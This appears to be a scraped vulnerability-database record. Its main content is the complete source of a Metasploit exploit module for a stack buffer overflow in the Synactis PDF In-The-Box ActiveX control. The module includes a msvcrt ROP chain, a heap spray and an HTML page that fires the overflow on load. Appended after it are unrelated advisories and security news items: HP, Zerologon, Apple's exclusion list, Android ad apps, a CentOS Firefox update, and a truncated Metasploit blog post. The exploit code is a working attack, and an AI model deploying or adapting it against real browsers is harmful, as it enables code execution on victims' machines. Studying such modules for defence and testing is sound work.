{"id": "MSF:EXPLOIT/WINDOWS/BROWSER/SYNACTIS_CONNECTTOSYNACTIS_BOF", "type": "metasploit", "bulletinFamily": "exploit", "title": "Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow", "description": "This module exploits a vulnerability found in Synactis' PDF In-The-Box ActiveX component, specifically PDF_IN_1.ocx. When a long string of data is given to the ConnectToSynactis function, which is meant to be used for the ldCmdLine argument of a WinExec call, a strcpy routine can end up overwriting a TRegistry class pointer saved on the stack, resulting in arbitrary code execution under the context of the user. Also note that since the WinExec function is used to call the default browser, you must be aware that: 1) The default must be Internet Explorer, and 2) when the exploit runs, another browser will pop up. Synactis PDF In-The-Box is also used by other software such as Logic Print 2013, which is how the vulnerability was found and publicly disclosed.\n", "published": "2013-06-07T01:05:08", "modified": "2020-10-02T20:00:37", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2020-10-12T22:50:11", "viewCount": 22, "enchantments": {"score": {"value": 4.7, "vector": "NONE", "modified": "2020-10-12T22:50:11", "rev": 2}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:7B2EAFA107D335014D553D78946C453E", "THREATPOST:CD0C6BFC2A71E723ABC80C9F2924375E"]}, {"type": "securelist", "idList": ["SECURELIST:B60BDBDD8BD41CE722ECD2F07BB00D34"]}, {"type": "thn", "idList": ["THN:DAE548E4C591A2718BC3A3D2C9440FB1"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:2E2A4B3CF204DCA81F5AA3AC47CF9604"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1834-1", "OPENSUSE-SU-2020:1831-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159923", "PACKETSTORM:159922", "PACKETSTORM:159930"]}, {"type": "exploitdb", "idList": ["EDB-ID:48999", "EDB-ID:48996"]}, {"type": "kitploit", "idList": ["KITPLOIT:7502592055175491881"]}, {"type": "hackread", "idList": ["HACKREAD:90806867A52B2AFC51E6A46C6C15553B"]}, {"type": "cve", "idList": ["CVE-2020-13661", "CVE-2020-5793", "CVE-2020-6015", "CVE-2020-14240"]}, {"type": "tenable", "idList": ["TENABLE:74AABB2A27AB230BE00C5C4318B367BE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:41A341FC7700914F2AB1EF95F5934698"]}], "modified": "2020-10-12T22:50:11", "rev": 2}, "vulnersScore": 4.7}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n #include Msf::Exploit::Remote::BrowserAutopwn\n #\n #autopwn_info({\n # :ua_name => HttpClients::IE,\n # :ua_minver => \"7.0\",\n # :ua_maxver => \"8.0\",\n # :javascript => true,\n # :classid => \"{C80CAF1F-C58E-11D5-A093-006097ED77E6}\",\n # :method => \"ConnectToSynactis\",\n # :os_name => OperatingSystems::Match::WINDOWS,\n # :rank => AverageRanking\n #})\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow\",\n 'Description' => %q{\n This module exploits a vulnerability found in Synactis' PDF In-The-Box ActiveX\n component, specifically PDF_IN_1.ocx. When a long string of data is given\n to the ConnectToSynactis function, which is meant to be used for the ldCmdLine\n argument of a WinExec call, a strcpy routine can end up overwriting a TRegistry\n class pointer saved on the stack, resulting in arbitrary code execution under the\n context of the user.\n\n Also note that since the WinExec function is used to call the default browser,\n you must be aware that: 1) The default must be Internet Explorer, and 2) when the\n exploit runs, another browser will pop up.\n\n Synactis PDF In-The-Box is also used by other software such as Logic Print 2013,\n which is how the vulnerability was found and publicly disclosed.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'h1ch4m',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n [ 'OSVDB', '93754' ],\n [ 'EDB', '25835' ]\n ],\n 'Platform' => 'win',\n 'Targets' =>\n [\n # Newer setups like Win + IE8: \"Object doesn't support this property or method\"\n [ 'Automatic', {} ],\n [\n 'IE 7 on Windows XP SP3', {'Eax' => 0x0c0c0c0c}\n ],\n [\n # 0x20302020 = Where the heap spray will land\n # 0x77c15ed5 = xchg eax,esp; rcr dword ptr [esi-75], 0c1h, pop ebp; ret 4\n 'IE 8 on Windows XP SP3',\n { 'Rop' => :msvcrt, 'Pivot' => 0x77C218D3, 'Ecx' => 0x20302024, 'Eax' => 0x20302028 }\n ]\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'StackAdjustment' => -3500\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Privileged' => false,\n 'DisclosureDate' => '2013-05-30',\n 'DefaultTarget' => 0))\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n code = payload.encoded\n\n case t['Rop']\n when :msvcrt\n print_status(\"Using msvcrt ROP\")\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n # Must be null-byte-free for the spray\n chain =\n [\n t['Pivot'],\n 0x41414141,\n t['Ecx'], # To ECX\n 0x77c1e844, # POP EBP # RETN [msvcrt.dll]\n 0x41414141,\n 0x77c1e844, # skip 4 bytes [msvcrt.dll]\n 0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]\n 0xffffffff,\n 0x77c127e5, # INC EBX # RETN [msvcrt.dll]\n 0x77c127e5, # INC EBX # RETN [msvcrt.dll]\n 0x77c4e0da, # POP EAX # RETN [msvcrt.dll]\n 0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)\n 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]\n 0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]\n 0x77c34fcd, # POP EAX # RETN [msvcrt.dll]\n 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)\n 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]\n 0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]\n 0x77c3048a, # POP EDI # RETN [msvcrt.dll]\n 0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]\n 0x77c46efb, # POP ESI # RETN [msvcrt.dll]\n 0x77c2aacc, # JMP [EAX] [msvcrt.dll]\n 0x77c3b860, # POP EAX # RETN [msvcrt.dll]\n 0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]\n 0x77c12df9, # PUSHAD # RETN [msvcrt.dll]\n 0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]\n ].pack(\"V*\")\n\n p = chain + align + code\n\n else\n p = \"\\x0c\" * 50 + code\n end\n\n p\n end\n\n def get_html(cli, req, target)\n js_p = ::Rex::Text.to_unescape(get_payload(target, cli), ::Rex::Arch.endian(target.arch))\n eax = \"\\\\x\" + [target['Eax']].pack(\"V*\").unpack(\"H*\")[0].scan(/../) * \"\\\\x\"\n\n html = %Q|\n <html>\n <head>\n <script>\n #{js_property_spray}\n\n function r()\n {\n var s = unescape(\"#{js_p}\");\n sprayHeap({shellcode:s});\n\n var p1 = '';\n var p2 = '';\n eax = \"#{eax}\";\n\n while (p1.length < 189) p1 += \"\\\\x0c\";\n while (p2.length < 7000) p2 += \"\\\\x0c\";\n\n var obj = document.getElementById(\"obj\");\n obj.ConnectToSynactis(p1+eax+p2);\n }\n </script>\n </head>\n <body OnLoad=\"r();\">\n <OBJECT classid=\"clsid:C80CAF1F-C58E-11D5-A093-006097ED77E6\" id=\"obj\"></OBJECT>\n </body>\n </html>\n |\n\n html.gsub(/^ {4}/, '')\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n target = get_target(agent)\n if target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n print_status(\"Target selected as: #{target.name}\")\n send_response(cli, get_html(cli, request, target), {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}

{"hp": [{"lastseen": "2021-01-16T23:27:33", "bulletinFamily": "software", "cvelist": ["CVE-2020-35686"], "description": "## Potential Security Impact\nEscalation of Privilege\n\n**Source**: HP, HP Product Security Response Team (PSRT) \n\n**Reported By**: HP \n\n## VULNERABILITY SUMMARY\nA potential security vulnerability has been identified in the Sound Research DCHU software modules which can allow escalation of privilege.\n\n## RESOLUTION\nSound Research Corporation has released updates to mitigate the potential vulnerability. HP has identified affected platforms and corresponding SoftPaqs with minimum versions that mitigate the potential vulnerability. See the affected platforms listed below.\n", "edition": 7, "modified": "2021-01-16T00:00:00", "published": "2021-01-16T00:00:00", "id": "HP:C06999561", "href": "https://support.hp.com/us-en/document/c06999561", "title": "HPSBHF03712 rev. 1 - Sound Research DCHU Software Escalation of Privilege", "type": "hp", "cvss": {"score": 0.0, "vector": "NONE"}}], "threatpost": [{"lastseen": "2021-01-15T21:53:29", "bulletinFamily": "info", "cvelist": ["CVE-2020-1472"], "description": "Microsoft is taking matters into its own hands when it comes to companies that haven\u2019t yet updated their systems to address the critical Zerologon flaw. The tech giant will soon by default block vulnerable connections on devices that could be used to exploit the flaw.\n\nStarting Feb. 9, Microsoft said it will enable domain controller \u201cenforcement mode\u201d by default, a measure that would help mitigate the threat.\n\nMicrosoft Active Directory domain controllers are at the heart of the Zerologon vulnerability. Domain controllers respond to authentication requests and verify users on computer networks. [A successful exploit of the flaw](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) allows unauthenticated attackers with network access to domain controllers to completely compromise all Active Directory identity services.\n\n[](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit>)\n\nClick to Register \u2013 New Browser Tab Opens\n\nDomain Controller enforcement mode \u201cwill block vulnerable connections from non-compliant devices,\u201d said Aanchal Gupta, VP of engineering with Microsoft [in a Thursday post](<https://msrc-blog.microsoft.com/2021/01/14/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/>). \u201cDC enforcement mode requires that all Windows and non-Windows devices use secure RPC with Netlogon secure channel unless customers have explicitly allowed the account to be vulnerable by adding an exception for the non-compliant device.\u201d\n\nSecure RPC is an authentication method that authenticates both the host and the user who is making a request for a service.\n\nThis new implementation is an attempt to block cybercriminals from gaining network access to domain controllers, which they can utilize to exploit the Zerologon privilege-escalation glitch ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)). The flaw, with a critical-severity CVSS score of 10 out of 10, was first addressed in [Microsoft\u2019s August 2020 security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>). But [starting in September](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>), at least four public Proof-of-Concept (PoC) exploits for the flaw were released on** **[Github,](<https://github.com/dirkjanm/CVE-2020-1472>) along with technical details of the vulnerability.\n\nThe enforcement mode \u201cis a welcome move because it is such a potentially damaging vulnerability that could be used to hijack full Domain Admin privileges \u2013 the \u2018Crown Jewels\u2019 of any network providing an attacker with God-mode for the Windows server network,\u201d Mark Kedgley, CTO at New Net Technologies (NNT), told Threatpost. \u201cBy defaulting this setting it is clear that it is seen as too dangerous to leave open. [The] message to everyone is to patch often and regularly and ensure your secure configuration build standard is up to date with the latest [Center for Internet Security] or [Security Technical Implementation Guide] recommendations.\u201d\n\nZerologon has grown more serious over the past few months as several threat actors and advanced persistent threat (APT) groups closed in on the flaw, including cybercriminals like the [China-backed APT Cicada](<https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/>) and [the MERCURY APT group](<https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/>).\n\n\u201cReported attacks began occurring within just two weeks of the vulnerability being disclosed,\u201d Ivan Righi, cyber threat intelligence analyst at Digital Shadows, told Threatpost. \u201cAPT10 (aka Cicada, Stone Panda, and Cloud Hoppe) was also observed leveraging Zerologon to target Japanese companies in November 2020.\u201d\n\nThe U.S. government has also stepped in to rally organizations to update after the publication of the exploits, with the DHS issuing [a rare emergency directive](<https://cyber.dhs.gov/assets/report/ed-20-04.pdf>) that ordered federal agencies to patch their Windows Servers against the flaw by Sept. 21.\n\nGupta for his part said that organizations can take four steps to avoid the serious flaw: Updating their domain controllers to an update released Aug. 11, 2020, or later; find which devices are making vulnerable connections (via monitoring log events); addressing those non-compliant devices making the vulnerable connections; and enabling domain controller enforcement.\n\n\u201cConsidering the severity of the vulnerability, it is advised that all Domain Controllers be updated with the latest security patch as soon as possible,\u201d Righi told Threatpost.\n\n**Supply-Chain Security: A 10-Point Audit Webinar:** _Is your company\u2019s software supply-chain prepared for an attack? On Wed., Jan. 20 at 2p.m. ET, start identifying weaknesses in your supply-chain with actionable advice from experts \u2013 part of a _[_limited-engagement and LIVE Threatpost webinar_](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_. CISOs, AppDev and SysAdmin are invited to ask a panel of A-list cybersecurity experts how they can avoid being caught exposed in a post-SolarWinds-hack world. Attendance is limited: _[**_Register Now_**](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_ and reserve a spot for this exclusive Threatpost _[_Supply-Chain Security webinar_](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_ \u2013 Jan. 20, 2 p.m._\n", "modified": "2021-01-15T21:47:20", "published": "2021-01-15T21:47:20", "id": "THREATPOST:27150C099FB4771B9DED4F6372D27EB7", "href": "https://threatpost.com/microsoft-implements-windows-zerologon-flaw-enforcement-mode/163104/", "type": "threatpost", "title": "Microsoft Implements Windows Zerologon Flaw 'Enforcement Mode'", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-15T21:55:05", "bulletinFamily": "info", "cvelist": ["CVE-2020-1472"], "description": "Apple has removed a contentious macOS feature that allowed some Apple apps to bypass content filters, VPNs and third-party firewalls.\n\nThe feature, [first uncovered in November](<https://threatpost.com/some-apple-apps-on-macos-big-sur-bypass-content-filters-vpns/161295/>) in a beta release of the macOS Big Sur feature, was called \u201cContentFilterExclusionList\u201d and included a list of at least 50 Apple apps \u2013 including Maps, Music, FaceTime, the App Store and its software update service. It has been recently removed in macOS Big Sur versions 11.2, Apple experts pointed out this week.\n\n\u201cAfter lots of bad press and lots of feedback/bug reports to Apple from developers such as myself, it seems wiser (more security conscious) minds at Cupertino prevailed,\u201d said Patrick Wardle, principal security researcher with Jamf, [this week](<https://www.patreon.com/posts/46179028>). \u201cThe ContentFilterExclusionList list has been removed (in macOS 11.2 beta 2).\u201d\n\n[](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit>)\n\nClick to Register \u2013 New Browser Tab Opens\n\nResearchers found these apps were excluded from being controlled by Apple\u2019s NEFilterDataProvider feature. NEFilterDataProvider is a simple network content filter, which is used by third-party application firewalls (such as host-based macOS application firewall Little Snitch) and VPNs to filter data traffic flow on an app-by-app basis.\n\nBecause these apps bypassed NEFilterDataProvider, the service could not monitor them to see how much data they were transferring or which IP addresses they were communicating with \u2013 and ultimately could not block them if something was amiss.\n\nAfter discovering the undocumented exclusion list back in November, security researchers criticized Apple, saying it was a liability that can be exploited by threat actors to bypass firewalls, give them access to people\u2019s systems and expose their sensitive data.\n\n\u201cMany (rightfully) asked, \u2018What good is a firewall if it can\u2019t block all traffic?\u2019 I of course also wondered if malware could abuse these \u2018excluded\u2019 items to generate network traffic that could surreptitiously bypass any socket filter firewall,\u201d said Wardle. \u201cUnfortunately the answer was yes.\u201d\n\nThe new change means that firewalls such as LuLu \u2013 an open-source firewall that blocks outgoing unknown connections on Macs \u2013 can now comprehensively filter and block network traffic for all Apple apps, Wardle said.\n\n> Omg we did it! \ud83e\udd29\n> \n> Thanks to the community feedback (and ya, bad press) Apple decided to remove the ContentFilterExclusionList (in 11.2 beta 2)\n> \n> Means socket filter firewalls (e.g. LuLu) can now comprehensively monitor/block all OS traffic!! \n> \n> Read more: <https://t.co/GJXkRA31e7> <https://t.co/BCPqdCjkV0>\n> \n> \u2014 patrick wardle (@patrickwardle) [January 13, 2021](<https://twitter.com/patrickwardle/status/1349488392732491776?ref_src=twsrc%5Etfw>)\n\nThreatpost has reached out to Apple for further information about ContentFilterExclusionList and its removal.\n\n**Supply-Chain Security: A 10-Point Audit Webinar:** _Is your company\u2019s software supply-chain prepared for an attack? On Wed., Jan. 20 at 2p.m. ET, start identifying weaknesses in your supply-chain with actionable advice from experts \u2013 part of a _[_limited-engagement and LIVE Threatpost webinar_](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_. CISOs, AppDev and SysAdmin are invited to ask a panel of A-list cybersecurity experts how they can avoid being caught exposed in a post-SolarWinds-hack world. Attendance is limited: _[**_Register Now_**](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_ and reserve a spot for this exclusive Threatpost _[_Supply-Chain Security webinar_](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_ \u2013 Jan. 20, 2 p.m._\n", "modified": "2021-01-15T17:02:52", "published": "2021-01-15T17:02:52", "id": "THREATPOST:85AADB48E6BE019D5C42A478E634237F", "href": "https://threatpost.com/apple-kills-macos-feature-allowing-apps-to-bypass-firewalls/163099/", "type": "threatpost", "title": "Apple Kills MacOS Feature Allowing Apps to Bypass Firewalls", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-15T20:03:23", "bulletinFamily": "info", "cvelist": [], "description": "Google has removed 164 apps, downloaded a total of 10 million times, from its Google Play marketplace because they were delivering \u201cdisruptive\u201d ads, considered malicious.\n\n[Last year](<https://threatpost.com/google-bans-600-android-apps/153101/>), the tech giant banned apps that delivered this type of advertising, called out-of-context ads. But the problem continues to plague Google despite numerous efforts by the company to prevent \u201cmalicious developers\u201d from submitting their apps to its Google Play marketplace.\n\nResearchers discovered the offending apps mimicking legitimate apps to garner downloads, \u201conly to then trick the user into seeing a whole bunch of unexpected ads,\u201d researchers Gabi Cirlig, Michael Gethers, Lisa Gansky and Adam Sell [wrote in a report published by WhiteOps Satori Threat Intelligence Team](<https://www.whiteops.com/blog/imitation-is-the-sincerest-form-of-fraudery>).\n\nWhiteOps identified the 164 apps, calling them CopyCatz apps, because bulk of those identified attempted to mimic the functions of other popular apps \u2013 and spewed the obnoxious ads.\n\n[](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit>)\n\nClick to Register \u2013 New Browser Tab Opens\n\n## **Beating Back the Tide of Bad Apps**\n\nGoogle has struggled with bad apps delivering [adware](<https://threatpost.com/google-boots-apps-from-play/160585/>) and other malware on Google Play for years, and has made [significant strides](<https://threatpost.com/google-efforts-against-bad-android-apps-work/152851/>) to prevent threat actors from sneaking their rogue apps on Google Play.\n\nLast February, [Google deleted 600 apps](<https://security.googleblog.com/2020/02/disruptive-ads-enforcement-and-our-new.html>) for displaying the same type of behavior as the latest raft of apps that were deleted, and subsequently banned them from the store. However, some threat actors didn\u2019t get the memo and still have been able to sneak these type of apps through, Satori researchers found.\n\nSo called CopyCatz apps, which serve up out-of-context ads, bombard users with ads regardless of whether the host app is active or not. Typically, the ads are considered obnoxious and can often contain disingenuous marketing messages. The Satori team discovered 164 apps containing the underlying code capable of displaying out-of-context ads. Linking the apps was the \u201ccom.tdc.adservice package\u201d, they wrote.\n\n## **Dropbox: Unwitting Participant **\n\n\u201cThe apps\u2019 behavior is controlled by a command-and-control JSON hosted on Dropbox,\u201d researchers wrote, adding that Dropbox is a victim and not a participant in the operation. \u201cThe URL of the JSON differs from app to app, but the structure is very similar, indicating the frequency of the ads and the Publisher ID to be used.\u201d\n\nResearchers detail the first app they observed triggering out-of-context ads in the recent campaign, which is called Assistive Touch 2020. The app is a copy of a legitimate app of the same name, minus the \u201c2020\u201d and with a misspelling, the latter being common tactic used by threat actors in this type of campaign, researchers said.\n\nOnce the app is installed, it reaches out to com.tdc.adservice package, which is its command-and-control server, which delivers parameters for how often the ads are displayed, what type they are \u2014 whether in-house ads or out-of-context ads \u2014 and from which platform they should be retrieved, they said.\n\nThe app then gives the unsuspecting user \u201ca grace period of a couple of hours\u201d before serving up the out-of-context ads, which are excluded from the device\u2019s list of recent apps. The ads also disappear as soon as user navigates away from it, researchers said.\n\n## **Curious Lack of Obfuscation **\n\nCuriously, the bad apps \u201cdidn\u2019t really try to cover their tracks\u201d once they were downloaded onto a user device, researchers noted.\n\n\u201cAll of them have the open-source Evernote job scheduler embedded inside used as a persistence mechanism,\u201d they said, adding once again that Evernote is not a willing partner in the operation. \u201cA quick lookup for Evernote jobs led us to the entry point of the out-of-context ads controller located inside the AdsJob class.\u201d\n\nThis lack of obfuscation fortunately for the user makes the bad apps easy to spot on someone\u2019s device, and researchers have included a [full list of apps](<https://www.whiteops.com/hubfs/CopyCatz%20App%20List.txt>) in an index to the report that they recommend Android users remove if they are found on their devices.\n\nThey also recommend that users block any apps that call ads from activities inside the package com.tdc.adservice.\n\n\u201cEven though platforms could choose to allow legitimate traffic from these apps by blocking only the out-of-context ads, the Satori Team recommends using the heavier-handed approach of blocking all the apps, since they were likely created very specifically to take advantage of the digital ecosystem,\u201d they wrote.\n\n**Supply-Chain Security: A 10-Point Audit Webinar:** _Is your company\u2019s software supply-chain prepared for an attack? On Wed., Jan. 20 at 2p.m. ET, start identifying weaknesses in your supply-chain with actionable advice from experts \u2013 part of a _[_limited-engagement and LIVE Threatpost webinar_](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_. CISOs, AppDev and SysAdmin are invited to ask a panel of A-list cybersecurity experts how they can avoid being caught exposed in a post-SolarWinds-hack world. Attendance is limited: _[**_Register Now_**](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_ and reserve a spot for this exclusive Threatpost _[_Supply-Chain Security webinar_](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)_ \u2013 Jan. 20, 2 p.m._\n", "modified": "2021-01-15T16:19:40", "published": "2021-01-15T16:19:40", "id": "THREATPOST:E752DEE3DF7F2426E15B9A942CB04862", "href": "https://threatpost.com/google-boots-164-apps-from-play/163091/", "type": "threatpost", "title": "Google Boots 164 Apps from Play Marketplace for Shady Ad Practices", "cvss": {"score": 0.0, "vector": "NONE"}}], "centos": [{"lastseen": "2021-01-16T01:36:52", "bulletinFamily": "unix", "cvelist": ["CVE-2020-16044"], "description": "**CentOS Errata and Security Advisory** CESA-2021:0053\n\n\nMozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 78.6.1 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: Use-after-free write when handling a malicious COOKIE-ECHO SCTP chunk (CVE-2020-16044)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2021-January/048243.html\n\n**Affected packages:**\nfirefox\n\n**Upstream details at:**\n", "edition": 1, "modified": "2021-01-15T20:13:17", "published": "2021-01-15T20:13:17", "id": "CESA-2021:0053", "href": "http://lists.centos.org/pipermail/centos-announce/2021-January/048243.html", "title": "firefox security update", "type": "centos", "cvss": {"score": 0.0, "vector": "NONE"}}], "rapid7blog": [{"lastseen": "2021-01-15T20:57:23", "bulletinFamily": "info", "cvelist": ["CVE-2020-1170", "CVE-2020-17136"], "description": "## Commemorating the 2020 December Metasploit community CTF\n\n\n\nA new commemorative banner has been added to the Metasploit console to celebrate the teams that participated in the [2020 December Metasploit community CTF](<https://blog.rapid7.com/2020/12/07/congrats-to-the-winners-of-the-2020-december-metasploit-community-ctf/>) and achieved 100 or more points:\n\n\n\nIf you missed out on participating in this most recent event, be sure to follow the [Metasploit Twitter](<https://twitter.com/metasploit>) and [Metasploit blog posts](<https://blog.rapid7.com/tag/metasploit/>). If there are any future Metasploit CTF events, all details will be announced there!\n\nIf the banners aren\u2019t quite your style, you can always disable them with the `quiet` flag:\n \n \n msfconsole -q\n \n\n## Windows privilege escalation via Cloud Filter driver\n\nOur very own [gwillcox-r7](<https://github.com/gwillcox-r7>) has created a new module for [CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP](<https://github.com/rapid7/metasploit-framework/pull/14585>), with credit to James Foreshaw for the initial vulnerability discovery and proof of concept. The Cloud Filter driver, `cldflt.sys`, on Windows 10 v1803 and later, prior to December 2020, did not set the `IO_FORCE_ACCESS_CHECK` or `OBJ_FORCE_ACCESS_CHECK` flags when calling `FltCreateFileEx()` and `FltCreateFileEx2()` within its `HsmpOpCreatePlaceholders()` function with attacker-controlled input. This meant that files were created with `KernelMode` permissions, thereby bypassing any security checks that would otherwise prevent a normal user from being able to create files in directories they don't have permissions to create files in.\n\nThis module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage Spaces SMP service, which grants the attacker code execution as the `NETWORK SERVICE` user. Users are strongly encouraged to set the `PAYLOAD` option to one of the Meterpreter payloads, as doing so will allow them to subsequently escalate their new session from `NETWORK SERVICE` to `SYSTEM` by using Meterpreter's `getsystem` command to perform RPCSS Named Pipe Impersonation and impersonate the `SYSTEM` user.\n\n## New Modules (3)\n\n * [WordPress AIT CSV Import Export Unauthenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/14572>) by h00die This adds an exploit module for various versions of the `AIT CSV Import / Export` plugin for Wordpress. This module exploits an unauthenticated file upload vulnerability in plugin versions below `v3.0.4` to gain code execution against Wordpress installations.\n * [CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP](<https://github.com/rapid7/metasploit-framework/pull/14585>) by Grant Willcox and James Foreshaw, which exploits [CVE-2020-17136](<https://attackerkb.com/topics/1yvp3hVNSN/cve-2020-17136?referrer=blog>), an arbitrary file write vulnerability within cldflt.sys. The result yields local code execution as the Network Service account which is suitable for escalating to SYSTEM via documented techniques.\n * [Windows Manage Volume Shadow Copies](<https://github.com/rapid7/metasploit-framework/pull/14582>) by [zeroSteiner](<https://github.com/zeroSteiner>) This adds the possibility to run post module actions as commands. This also consolidates and improves existing VSS modules into one new single module with multiple actions.\n\n## Enhancements and Features\n\n * [#14562](<https://github.com/rapid7/metasploit-framework/pull/14562>) from [zeroSteiner](<https://github.com/zeroSteiner>) Improves the readability of Meterpreter error messages by replacing the command ID with the command name\n * [#14582](<https://github.com/rapid7/metasploit-framework/pull/14582>) from [zeroSteiner](<https://github.com/zeroSteiner>) This adds the possibility to run post module actions as commands. This also consolidates and improves existing VSS modules into one new single module with multiple actions.\n * [#14600](<https://github.com/rapid7/metasploit-framework/pull/14600>) from [zeroSteiner](<https://github.com/zeroSteiner>) The FileSystem mixin has been reorganized and a number of function aliases have been added to assist developers in using the module. Additionally new YARD documentation has been added to better explain the functionality of several of the FileSystem mixin's functions to assist developers in determining when to use these functions.\n * [#14606](<https://github.com/rapid7/metasploit-framework/pull/14606>) from [bwatters-r7](<https://github.com/bwatters-r7>) This adds a banner commemorating all of the teams that participated in the Q4 2020 CTF.\n\n## Bugs Fixed\n\n * [#14515](<https://github.com/rapid7/metasploit-framework/pull/14515>) from [timwr](<https://github.com/timwr>) This fixes an issue with both cmd/unix/reverse_awk and cmd/unix/bind_awk payloads that were not correctly terminating when after a session was closed. This was causing endless session creations and high CPU consumption on the target.\n * [#14605](<https://github.com/rapid7/metasploit-framework/pull/14605>) from [zeroSteiner](<https://github.com/zeroSteiner>) This PR fixes an issue where the `VHOST` option was not being correctly populated when the `RHOST` option was a domain name\n * [#14613](<https://github.com/rapid7/metasploit-framework/pull/14613>) from [adfoster-r7](<https://github.com/adfoster-r7>) Fixes a regression error with modules depending on NTLM such as cve_2019_0708_bluekeep\n * [#14614](<https://github.com/rapid7/metasploit-framework/pull/14614>) from [zeroSteiner](<https://github.com/zeroSteiner>) A bug within the module for [CVE-2020-17136](<https://attackerkb.com/topics/1yvp3hVNSN/cve-2020-17136?referrer=blog>) occurred where a relative path was used instead of an absolute path when attempting to load the C# exploit exe. The code has been replaced with a call to `File.expand_path()` to allow the module to dynamically determine the full path to this file, allowing users to use the module regardless of which directory they are in when running `msfconsole`.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 